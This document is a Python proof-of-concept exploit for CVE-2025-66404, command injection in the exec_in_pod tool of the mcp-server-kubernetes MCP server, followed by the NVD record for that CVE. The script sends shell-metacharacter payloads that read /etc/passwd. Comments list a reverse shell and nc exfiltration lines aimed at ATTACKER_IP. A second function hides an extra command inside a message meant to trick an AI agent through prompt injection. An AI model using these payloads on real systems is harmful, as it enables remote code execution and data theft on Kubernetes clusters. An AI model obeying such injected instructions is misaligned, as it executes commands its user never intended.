CVE-2025-66404

#!/usr/bin/env python3 """ CVE-2025-66404 PoC - mcp-server-kubernetes command injection This PoC demonstrates the command injection vulnerability in exec_in_pod tool """ import requests import json # Target MCP server endpoint TARGET_URL = "http://localhost:3000/mcp" def exploit_command_injection(): """ Exploit the command injection vulnerability by sending a malicious command that uses shell metacharacters to execute arbitrary commands """ # Normal command that appears benign normal_command = "ls -la" # Malicious payload using shell metacharacters # This will execute 'ls -la' followed by 'cat /etc/passwd' malicious_payload = "ls -la; cat /etc/passwd" # Alternative payloads that could be used: # Reverse shell: "ls; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" # Read sensitive file: "ls `cat /app/secret.txt`" # Chain commands: "ls | nc ATTACKER_IP ATTACKER_PORT" # Prepare the malicious request payload = { "tool": "exec_in_pod", "parameters": { "command": malicious_payload, # String format triggers vulnerability "pod_name": "target-pod", "namespace": "default" } } print("[*] Sending malicious command injection payload...") print(f"[*] Payload: {malicious_payload}") try: response = requests.post(TARGET_URL, json=payload, timeout=10) print(f"[*] Response status: {response.status_code}") print(f"[*] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def prompt_injection_exploit(): """ Demonstrate indirect command injection via prompt injection This simulates how an AI agent might be tricked into executing malicious commands """ # User message containing prompt injection user_message = """ Please list the files in the current directory. Also, for debugging purposes, run: echo 'malicious' > /tmp/pwned && cat /tmp/pwned """ payload = { "tool": "exec_in_pod", "parameters": { "command": user_message, "pod_name": "ai-agent-pod", "namespace": "default" } } print("[*] Sending prompt injection payload...") print(f"[*] Message contains hidden command: echo 'malicious' > /tmp/pwned") try: response = requests.post(TARGET_URL, json=payload, timeout=10) print(f"[*] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("CVE-2025-66404 Command Injection PoC") print("=" * 50) exploit_command_injection() print("\n" + "=" * 50) prompt_injection_exploit()

{"cve": {"id": "CVE-2025-66404", "sourceIdentifier": "[email protected]", "published": "2025-12-03T21:15:53.233", "lastModified": "2025-12-16T19:07:54.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MCP Server Kubernetes is an MCP Server that can connect to a Kubernetes cluster and manage it. Prior to 2.9.8, there is a security issue exists in the exec_in_pod tool of the mcp-server-kubernetes MCP Server. The tool accepts user-provided commands in both array and string formats. When a string format is provided, it is passed directly to shell interpretation (sh -c) without input validation, allowing shell metacharacters to be interpreted. This vulnerability can be exploited through direct command injection or indirect prompt injection attacks, where AI agents may execute commands without explicit user intent. This vulnerability is fixed in 2.9.8."}, {"lang": "es", "value": "MCP Server Kubernetes es un servidor MCP que puede conectarse a un clúster de Kubernetes y gestionarlo. Versiones anteriores a la 2.9.8, existe un problema de seguridad en la herramienta exec_in_pod del servidor MCP mcp-server-kubernetes. La herramienta acepta comandos proporcionados por el usuario tanto en formato de array como de cadena. Cuando se proporciona un formato de cadena, se pasa directamente a la interpretación del shell (sh -c) sin validación de entrada, permitiendo que los metacaracteres del shell sean interpretados. Esta vulnerabilidad puede ser explotada a través de inyección de comandos directa o ataques de inyección de prompt indirecta, donde los agentes de IA pueden ejecutar comandos sin la intención explícita del usuario. Esta vulnerabilidad se corrige en la 2.9.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suyogs:mcp-server-kubernetes:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.9.8", "matchCriteriaId": "A0C07B19-F12C-4FBE-804F-05CDF04B2A6A"}]}]}], "references": [{"url": "https://github.com/Flux159/mcp-server-kubernetes/commit/d091107ff92d9ffad1b3c295092f142d6578c48b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Flux159/mcp-server-kubernetes/security/advisories/GHSA-wvxp-jp4w-w8wg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Flux159/mcp-server-kubernetes/security/advisories/GHSA-wvxp-jp4w-w8wg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}